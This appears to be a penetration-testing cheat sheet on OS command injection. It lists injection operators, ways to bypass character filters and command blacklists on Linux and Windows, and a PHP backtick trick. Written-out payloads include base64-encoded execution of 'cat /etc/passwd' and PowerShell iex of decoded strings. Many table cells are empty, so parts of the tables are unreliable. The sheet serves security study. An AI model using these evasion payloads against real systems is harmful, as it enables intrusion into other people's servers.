OS Command Injection


  • Injection vulnerabilities are considered the number 3 risk in OWASP's Top 10 Web App Risks, given their high impact and how common they are.

  • Injection occurs when user-controlled input is misinterpreted as part of the web query or code being executed, which may lead to subverting the intended outcome of the query to a different outcome that is useful to the attacker.

  • When it comes to OS Command Injections, the user input we control must directly or indirectly go into (or somehow affect) a web query that executes system commands.

OS Command Injection Tools

Injection Operators

Injection OperatorInjection CharacterURL-Encoded CharacterExecuted Command





New Line






Both (second output generally shown first)




Both (only second output is shown)




Both (only if first succeeds)




Second (only if first fails)




Both (Linux-only)




Both (Linux-only)

Linux Filtered Character Bypass

Filtered CharacterBypass MethodDescription

printenv command


Can be used to view all environment variables

Space Character


Using tabs instead of spaces

Space Character


Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. $())

Space Character


Commas will be replaced with spaces

/ Character


Will be replaced with /

; Character


Will be replaced with ;

Any Character

$(tr '!-}' '"-~'<<<[)

Shift character by one ([ -> )

Windows Filtered Character Bypass

Filtered CharacterBypass MethodDescription

Env command

Get-ChildItem Env

Can be used to view all environment variables - (PowerShell)

Space Character


Using tabs instead of spaces

Space Character


Will be replaced with a space - (CMD)

Space Character


Will be replaced with a space - (PowerShell)

\ Character


Will be replaced with \ - (CMD)

\ Character


Will be replaced with \ - (PowerShell)

Linux Blacklisted Command Bypass

Blacklist BypassPayloadDescription

Case Manipulation

$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")

Execute command regardless of cases

Case Manipulation

$(a="WhOaMi";printf %s "${a,,}")

Another variation of the technique

Reversing a Command

echo 'whoami' | rev

Reverse a string

Reversing a Command


Execute reversed command

Base64 Encoding Commands

echo -n 'cat /etc/passwd | grep 33' | base64

Encode a string with base64

Base64 Encoding Commands

bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)

Execute b64 encoded string

Windows Blacklisted Command Bypass

Blacklist BypassPayload

Case Manipulation


Reversing a Commands

"whoami"[-1..-20] -join ''

Reversing a Commands

iex "$('imaohw'[-1..-20] -join '')"

Base64 Encoding Commands


Base64 Encoding Commands

iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('BASE64OUT')))"

Miscellaneous & Tricks

This section contains tricks for specific languages and web frameworks

PHP backtick character

The backtick character (`) in PHP can be used to gain OS command injection, as it is a character used for shell commands execution, similarly to shell_exec()function.

When you enclose a string in backticks, PHP will execute it as a shell command and return the output.

Consider the following example scenario:

  1. You are dealing with a web application written in PHP where a ping.php page is hosted.

  2. Navigating to http://example.com/ping.php?ip= allows users to ping the ip address specified (

  3. If any standard way to perform OS command execution does not work, you could use the backticks to your advantage. For example, you could navigate to: http://example.com/ping.php?ip=;`ls` to effectively run the ls command after the ping

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